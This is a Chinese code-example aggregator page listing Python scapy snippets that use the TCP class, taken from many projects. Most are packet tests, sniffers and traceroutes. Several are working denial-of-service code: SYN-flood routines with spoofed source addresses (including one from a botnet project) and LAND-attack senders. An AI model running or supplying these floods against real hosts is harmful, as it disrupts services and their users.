python类TCP的实例源码

inputfile.py 文件源码 项目:heartbreaker 作者: lokori 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def read_file(self, filename):
        if not scapy_installed:
            exit("Could not read pcap due to missing scapy")
        self.params['ppid']=0
        print "Opening pcap file %s" % filename
        packets=rdpcap(filename)
        for p in packets:
            if scapy_sctp and SCTPChunkData in p:
                msg=p.data
            elif (TCP in p and Raw in p) or UDP in p or (Ethernet in p and Raw in p):
                msg = p.load
            if p.time >= self.start and p.time <= self.stop:
                self.packets.append(msg)
                self.uniquesamples.add(msg)
            ppid=getattr(p,'proto_id',0)
            if self.params['ppid'] != ppid:
                self.params['ppid'] = ppid
# This is not used so don't print
#        if self.params['ppid'] != 0:
#            print "Using PPID %d" %  self.params['ppid']
test_1.py 文件源码 项目:VPP_P4 作者: RuchaMarathe 项目源码 文件源码 阅读 29 收藏 0 点赞 0 评论 0
def test_mtu_regular(exp_src_mac, exp_dst_mac, port_interface_mapping, a, create_str):

    fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80)
    fwd_pkt2 = Ether() / IP(dst='10.1.0.34') / TCP(sport=5793, dport=80)
    fwd_pkt3 = Ether() / IP(dst='10.1.0.32') / TCP(sport=5793, dport=80) / Raw(create_str)

    exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt2 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.34', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt3 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.32', ttl=fwd_pkt3[IP].ttl-1) / TCP(sport=5793, dport=80) / Raw(create_str))
    pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1},
                                                          {'port': 1, 'packet': fwd_pkt2},
                                                          {'port': 1, 'packet': fwd_pkt3}])
    input_ports = {0, 1}
    output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1},
                               {'port': 2, 'packet': exp_pkt2},
                               {'port': 3, 'packet': exp_pkt3}], pack, input_ports)
    return output
test_1.py 文件源码 项目:VPP_P4 作者: RuchaMarathe 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def test_mtu_failing(exp_src_mac, exp_dst_mac, port_interface_mapping, a, create_str):

    fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80)
    fwd_pkt2 = Ether() / IP(dst='10.1.0.34') / TCP(sport=5793, dport=80)
    fwd_pkt3 = Ether() / IP(dst='10.1.0.32') / TCP(sport=5793, dport=80) / Raw(create_str)

    exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt2 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.34', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt3 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.32', ttl=fwd_pkt3[IP].ttl-1) / TCP(sport=5793, dport=80) / Raw(create_str))
    pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1},
                                                          {'port': 1, 'packet': fwd_pkt2},
                                                          {'port': 1, 'packet': fwd_pkt3}])
    input_ports = {0, 1}
    output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1},
                               {'port': 2, 'packet': exp_pkt2},
                               {'port': 3, 'packet': exp_pkt3}], pack, input_ports)
    return output
test_1.py 文件源码 项目:VPP_P4 作者: RuchaMarathe 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def test_multicast_sa_da(a, port_interface_mapping, exp_src_mac, exp_dst_mac):

    fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80)
    fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80)

    exp_pkt1 = (Ether(src=exp_src_mac) /
                IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt2 = (Ether(src=exp_src_mac) /
                IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80))

    pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1},
                                                          {'port': 1, 'packet': fwd_pkt2}])
    input_ports = {0, 1}
    output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1},
                               {'port': 3, 'packet': exp_pkt1},
                               {'port': 4, 'packet': exp_pkt2},
                               {'port': 5, 'packet': exp_pkt2},
                               {'port': 6, 'packet': exp_pkt2}], pack, input_ports)
    return output
test_1.py 文件源码 项目:VPP_P4 作者: RuchaMarathe 项目源码 文件源码 阅读 40 收藏 0 点赞 0 评论 0
def test_multicast_rpf(a, port_interface_mapping, exp_src_mac, exp_dst_mac):

    fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80)
    fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80)

    exp_pkt1 = (Ether(src=exp_src_mac) /
                IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))
    exp_pkt2 = (Ether(src=exp_src_mac) /
                IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80))
    # The ports 1 nad 0 are exchanged to check that the rpf and ingress port are different , 
    # thus dropping the packets
    pack = send_pkts_and_capture(port_interface_mapping, [{'port': 1, 'packet': fwd_pkt1},
                                                          {'port': 0, 'packet': fwd_pkt2}])
    input_ports = {0, 1}
    output = create_port_seq_list([], pack, input_ports)
    return output
8_5_modify_ip_in_a_packet.py 文件源码 项目:Python-Network-Programming-Cookbook-Second-Edition 作者: PacktPublishing 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None):
    """Modify and send an IP packet."""
    if protocol == 'tcp':
        packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port)
    elif protocol == 'udp':
        if flags: raise Exception(" Flags are not supported for udp")
        packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port)
    else:
        raise Exception("Unknown protocol %s" % protocol)

    send(packet, iface=iface)
cmd_traceroute.py 文件源码 项目:habu 作者: portantier 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def cmd_traceroute(ip, port, iface):

    conf.verb = False

    if iface:
        conf.iface = iface

    pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)

    for pkt in pkts:

        ans = sr1(pkt, timeout=1, iface=conf.iface)

        if not ans:
            print('.')
            continue

        print(ans.summary())

        if TCP in ans and ans[TCP].flags == 18:
            break

    return True
sniffer_extractor.py 文件源码 项目:smart_sniffer 作者: ScarWar 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def is_client(_packet):
    """
    SYN = 0x02
    ACK = 0x10
    :param _packet: 
    :return: source ip if client
    """
    t = _packet[s.TCP]
    if t.flags & 0x02 and not t.flags & 0x10:
        return True
    tcp = _packet.getlayer(s.TCP)
    if tcp.sport > tcp.dport:  # if the sport is higher then likely it is the client
        return True
    return False


# get delay average for session
sniffer_extractor.py 文件源码 项目:smart_sniffer 作者: ScarWar 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def cap_session(pcap_path):
    capture = s.rdpcap(pcap_path)  # TODO when go live change to session capture
    first = True
    curr_session = None
    session_info = [0, ] * 3
    for pkt in capture:
        if not pkt.haslayer(s.TCP) and not pkt.haslayer(s.IP) and pkt.len <= 0:
            continue

        if first:
            first = False
            if is_client(pkt):
                session_info[0] = pkt[s.IP].src
                session_info[1] = pkt[s.IP].dst
                session_info[2] = "TCP"
                curr_session = Session(pkt, session_info, session_info[0])
            else:
                session_info[0] = pkt[s.IP].dst
                session_info[1] = pkt[s.IP].src
                session_info[2] = "TCP"
                curr_session = Session(pkt, session_info, session_info[0])
        else:
            curr_session.update_session(pkt)

    return curr_session
acl_port_range_traffic_test.py 文件源码 项目:sonic-mgmt 作者: Azure 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def runTest(self):
        pkt = scapy2.Ether(src="e4:1d:2d:a5:f3:ac", dst="00:02:03:04:05:00")
        pkt /= scapy2.IP(src="10.0.0.1", dst="10.0.0.0")

        # get L4 port number
        port_number = testutils.test_params_get("port_number")
        port = port_number["port_number"]
        pkt /= scapy2.TCP(sport = int(port))
        pkt /= ("badabadaboom")

        # get packets number
        count = testutils.test_params_get("count")
        pack_number = count["count"]

        # send packets
        send(self, 0, pkt, int(pack_number))
test_txscapy.py 文件源码 项目:ooniprobe-debian 作者: TheTorProject 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def test_send_packet_with_answer(self):
        from scapy.all import IP, TCP

        sender = txscapy.ScapySender()
        self.scapy_factory.registerProtocol(sender)

        packet_sent = IP(dst='8.8.8.8', src='127.0.0.1') / TCP(dport=53,
                                                               sport=5300)
        packet_received = IP(dst='127.0.0.1', src='8.8.8.8') / TCP(sport=53,
                                                                   dport=5300)

        d = sender.startSending([packet_sent])
        self.scapy_factory.super_socket.send.assert_called_with(packet_sent)

        sender.packetReceived(packet_received)

        result = yield d
        assert result[0][0][0] == packet_sent
        assert result[0][0][1] == packet_received
09_05_modify_ip_in_a_packet.py 文件源码 项目:011_python_network_programming_cookbook_demo 作者: jerry-0824 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None):
    """ Modify and sned an IP packet. """
    if protocol == 'tcp':
        packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port)
    elif protocol == 'udp':
        if flags: raise Exception(" Flags are not suppored for udp")
        packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port)
    else:
        raise Exception("Unknown protocol %s" % protocol)

    send(packet, iface=iface)
test_1.py 文件源码 项目:VPP_P4 作者: RuchaMarathe 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def test_ttl_cases(exp_src_mac, exp_dst_mac, port_interface_mapping, a):

    fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80)
    fwd_pkt2 = Ether() / IP(dst='10.1.0.34', ttl =1) / TCP(sport=5793, dport=80)
    fwd_pkt3 = Ether() / IP(dst='10.1.0.32', ttl=0) / TCP(sport=5793, dport=80)

    exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) /
                IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80))

    pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1},
                                                          {'port': 1, 'packet': fwd_pkt2},
                                                          {'port': 1, 'packet': fwd_pkt3}])
    input_ports = {0, 1}
    output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}], pack, input_ports)
    return output
cmd_land.py 文件源码 项目:habu 作者: portantier 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def cmd_land(ip, count, port, iface, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    layer3 = IP()
    layer3.dst = ip
    layer3.src = ip

    layer4 = TCP()
    layer4.dport = port
    layer4.sport = port

    pkt = layer3 / layer4

    counter = 0

    while True:
        send(pkt)
        counter += 1

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        if count != 0 and counter == count:
            break

    return True
cmd_isn.py 文件源码 项目:habu 作者: portantier 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def cmd_isn(ip, port, count, iface, graph, verbose):

    conf.verb = False

    if iface:
        conf.iface = iface

    isn_values = []

    for _ in range(count):
        pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S")
        ans = sr1(pkt, timeout=0.5)
        if ans:
            send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A'))
            isn_values.append(ans[TCP].seq)
            if verbose:
                ans.show2()

    if graph:

        try:
            import matplotlib.pyplot as plt
        except ImportError:
            print("To graph support, install matplotlib")
            return 1

        plt.plot(range(len(isn_values)), isn_values, 'ro')
        plt.show()

    else:

        for v in isn_values:
            print(v)

    return True
ActualBot.py 文件源码 项目:ActualBotNet 作者: invasi0nZ 项目源码 文件源码 阅读 30 收藏 0 点赞 0 评论 0
def syn_flood(self, target, port):
        from scapy.all import IP, TCP, send
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = target
        t = TCP()
        t.sport = random.randint(1, 65500)
        t.dport = port
        t.flags = 'S'
        send(i / t, verbose=0)
land.py 文件源码 项目:pina-colada 作者: ecthros 项目源码 文件源码 阅读 22 收藏 0 点赞 0 评论 0
def launch(self):
        send(IP(src=self.get_value("target"), dst=self.get_value("target"))/TCP(sport=self.get_value("port"), dport=self.get_value("port")), count=self.get_value("size"))
s_sniffer.py 文件源码 项目:smart_sniffer 作者: ScarWar 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def make_stamp(pkt):
    if s.IP in pkt:
        ip_send = pkt[s.IP].src
        ip_rec = pkt[s.IP].dst
    else:
        return None

    if s.TCP in pkt:
        # port_send = pkt[TCP].sport
        # port_rec = pkt[TCP].dport
        protocol = "TCP"

    elif s.UDP in pkt:
        # port_send = pkt[UDP].sport
        # port_rec = pkt[UDP].dport
        protocol = "UDP"

    elif s.ICMP in pkt:
        # port_send = 1  # pkt[ICMP].sport
        # port_rec = 1  # pkt[ICMP].dport
        protocol = "ICMP"

    else:
        return None  # if not TCP or UDP or ICMP

    return ip_send, ip_rec, protocol
sniffer_extractor.py 文件源码 项目:smart_sniffer 作者: ScarWar 项目源码 文件源码 阅读 26 收藏 0 点赞 0 评论 0
def get_feat(self):
        # if self.session.session_info[2] == "TCP":
        #     proto = 1
        # else:
        #     proto = 0
        curr_features = 1
        n_features = 7
        # number of full packets in the client
        num_small_packets_pkt_s = get_n_small(self.in_pkts)
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        # number of small packets in the client
        num_small_pkt_c = get_n_big(self.out_pkts)
        curr_features += 1
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        # get max/mean len of packet
        cc_len_sec = get_lens_per_sec(self.in_pkts)
        curr_features += 1
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        # get max/mean out_pkt
        cl_len_sec = get_lens_per_sec(self.out_pkts)
        curr_features += 1
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        # get average server client delay time
        avg_c2c, avg_s2c2s = get_delay_average(self.session, self.session.our_ip)  # use in_pkt
        curr_features += 2
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        max_c, max_s = get_max_delay(self.session, self.session.our_ip)
        curr_features += 2
        print "Extracted " + str(curr_features) + " features out of " + str(n_features)

        return num_small_pkt_c, num_small_packets_pkt_s, cc_len_sec, cl_len_sec, avg_c2c, avg_s2c2s, max_c, max_s
session.py 文件源码 项目:smart_sniffer 作者: ScarWar 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def check_if_got_fin(pkt):
    FIN = 0x01
    F = pkt["TCP"].flags
    if F & FIN:
        return True
    return False
acl_tcp_test.py 文件源码 项目:sonic-mgmt 作者: Azure 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def pkt_callback(self, pkt):
        if pkt.haslayer(scapy2.TCP) and pkt.getlayer(scapy2.IP).src == "22.0.0.2":
            self.sniffed_cnt += 1
chinatrigger.py 文件源码 项目:ooniprobe-debian 作者: TheTorProject 项目源码 文件源码 阅读 25 收藏 0 点赞 0 评论 0
def test_send_mutations(self):
        from scapy.all import IP, TCP
        pkt = "\x16\x03\x01\x00\xcc\x01\x00\x00\xc8"\
              "\x03\x01\x4f\x12\xe5\x63\x3f\xef\x7d"\
              "\x20\xb9\x94\xaa\x04\xb0\xc1\xd4\x8c"\
              "\x50\xcd\xe2\xf9\x2f\xa9\xfb\x78\xca"\
              "\x02\xa8\x73\xe7\x0e\xa8\xf9\x00\x00"\
              "\x3a\xc0\x0a\xc0\x14\x00\x39\x00\x38"\
              "\xc0\x0f\xc0\x05\x00\x35\xc0\x07\xc0"\
              "\x09\xc0\x11\xc0\x13\x00\x33\x00\x32"\
              "\xc0\x0c\xc0\x0e\xc0\x02\xc0\x04\x00"\
              "\x04\x00\x05\x00\x2f\xc0\x08\xc0\x12"\
              "\x00\x16\x00\x13\xc0\x0d\xc0\x03\xfe"\
              "\xff\x00\x0a\x00\xff\x01\x00\x00\x65"\
              "\x00\x00\x00\x1d\x00\x1b\x00\x00\x18"\
              "\x77\x77\x77\x2e\x67\x6e\x6c\x69\x67"\
              "\x78\x7a\x70\x79\x76\x6f\x35\x66\x76"\
              "\x6b\x64\x2e\x63\x6f\x6d\x00\x0b\x00"\
              "\x04\x03\x00\x01\x02\x00\x0a\x00\x34"\
              "\x00\x32\x00\x01\x00\x02\x00\x03\x00"\
              "\x04\x00\x05\x00\x06\x00\x07\x00\x08"\
              "\x00\x09\x00\x0a\x00\x0b\x00\x0c\x00"\
              "\x0d\x00\x0e\x00\x0f\x00\x10\x00\x11"\
              "\x00\x12\x00\x13\x00\x14\x00\x15\x00"\
              "\x16\x00\x17\x00\x18\x00\x19\x00\x23"\
              "\x00\x00"

        pkt = ChinaTriggerTest.set_all_random_fields(pkt)
        pkts = [IP(dst=self.dst)/TCP(dport=self.port)/pkt]
        for x in range(len(pkt)):
            mutation = IP(dst=self.dst)/TCP(dport=self.port)/ChinaTriggerTest.mutate(pkt, x)
            pkts.append(mutation)
        return self.sr(pkts, timeout=2)
test_txscapy.py 文件源码 项目:ooniprobe-debian 作者: TheTorProject 项目源码 文件源码 阅读 24 收藏 0 点赞 0 评论 0
def test_send_packet_no_answer(self):
        from scapy.all import IP, TCP

        sender = txscapy.ScapySender()
        self.scapy_factory.registerProtocol(sender)
        packet = IP(dst='8.8.8.8') / TCP(dport=53)
        sender.startSending([packet])
        self.scapy_factory.super_socket.send.assert_called_with(packet)
        assert len(sender.sent_packets) == 1
txscapy.py 文件源码 项目:ooniprobe-debian 作者: TheTorProject 项目源码 文件源码 阅读 21 收藏 0 点赞 0 评论 0
def TCPTraceroute(self, host):
        if host not in self.hosts:
            self.hosts.append(host)

        d = defer.Deferred()
        reactor.callLater(self.timeout, d.callback, self)

        for dst_port in self.dst_ports:
            self.sendPackets(
                IP(dst=host, ttl=(self.ttl_min, self.ttl_max), id=RandShort()) / TCP(flags=2L, dport=dst_port,
                                                                                     sport=RandShort(),
                                                                                     seq=RandShort()))
        return d
txscapy.py 文件源码 项目:ooniprobe-debian 作者: TheTorProject 项目源码 文件源码 阅读 20 收藏 0 点赞 0 评论 0
def packetReceived(self, packet):
        l = packet.getlayer(1)
        if not l:
            return
        elif isinstance(l, ICMP) or isinstance(l, UDP) or isinstance(l, TCP):
            self._recvbuf.append(packet)
cmd_synflood.py 文件源码 项目:habu 作者: portantier 项目源码 文件源码 阅读 19 收藏 0 点赞 0 评论 0
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):

    conf.verb = False

    if interface:
        conf.iface = interface

    layer2 = Ether()

    layer3 = IP()
    layer3.dst = ip

    layer4 = TCP()
    layer4.dport = port

    pkt = layer2 / layer3 / layer4

    counter = 0

    print("please, remember to block your RST responses")

    while True:
        if forgeip:
            pkt[IP].src = "%s.%s" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()

        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            print('.', end='')
            sys.stdout.flush()

        sendp(pkt)
        counter += 1

        if count != 0 and counter == count:
            break

    return True
acl_tcp_test.py 文件源码 项目:sonic-mgmt 作者: Azure 项目源码 文件源码 阅读 23 收藏 0 点赞 0 评论 0
def runTest(self):

        pkt = scapy2.Ether()
        pkt /= scapy2.IP(src="21.0.0.2", dst="22.0.0.2")
        pkt /= scapy2.TCP(dport = 80, flags="S", seq=42)
        pkt /= ("badabadaboom")

        t = Thread(target=self.Sniffer, args=("eth2",))
        t.start()
        scapy2.sendp(pkt, iface='eth2')
        sleep(4)
        # fail if no reply
        if self.sniffed_cnt == 0:
            self.assertTrue(False)


        #res = scapy2.sniff(iface="eth2", timeout=3)
        #print res
        #if res:
        #    raise

        #if reply:
        #    raise
        #print "================______====\n"
        #print reply
        #print error
        #print "================______====\n"
        #if reply:
        #    reply.show()
        #(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)
        #send_packet(self, 0, pkt)
        #(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)


#        verify_packet(self, masked_exp_pkt, 1)


        #mpkt = Mask(pkt)
        #mpkt.set_do_not_care(0, 14*8)
        #mpkt.set_do_not_care(16*8, 49*8)
        #verify_packet(self, mpkt, 0)
        #(rcv_device, rcv_port, rcv_pkt, pkt_time) = dp_poll(self, device_number=0, port_number=0, timeout=5)
        #print "================______====\n"
        #y = 0
        #for x in rcv_pkt:
        #    print "%d - %X" % (y, ord(x))
        #    y +=1


问题


面经


文章

微信
公众号

扫码关注公众号